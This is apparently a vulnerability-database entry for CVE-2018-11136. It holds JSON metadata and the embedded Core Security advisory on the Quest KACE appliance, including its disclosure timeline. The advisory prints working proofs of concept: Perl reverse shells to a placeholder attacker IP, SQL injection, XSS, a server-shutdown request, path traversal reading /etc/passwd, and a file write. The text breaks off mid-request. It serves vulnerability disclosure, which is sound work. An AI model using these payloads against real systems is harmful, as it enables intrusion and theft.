Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified that the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action. 
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. 
With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0596",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11136"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11136",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11136",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11136",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11136",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1218",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11136",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, a blind time-based type). Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. 
*Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. 
\n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. 
\n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. 
\n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. 
\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). 
\n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgid\u0027 parameter of the \u0027/common/download_agent_installer.php\u0027 script\nis not sanitized and is vulnerable to SQL injection. In particular, a blind\ntime based type. As noted in 7.1, this script is reachable by anonymous\nusers, so no authentication is required. 
\n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportId\u0027 parameter of the \u0027/common/run_report.php\u0027 script is\nvulnerable to SQL injection. In particular, an error based\ntype. The proof of concept below is sent with a valid session cookie. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: 
qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. 
\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. 
*Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; 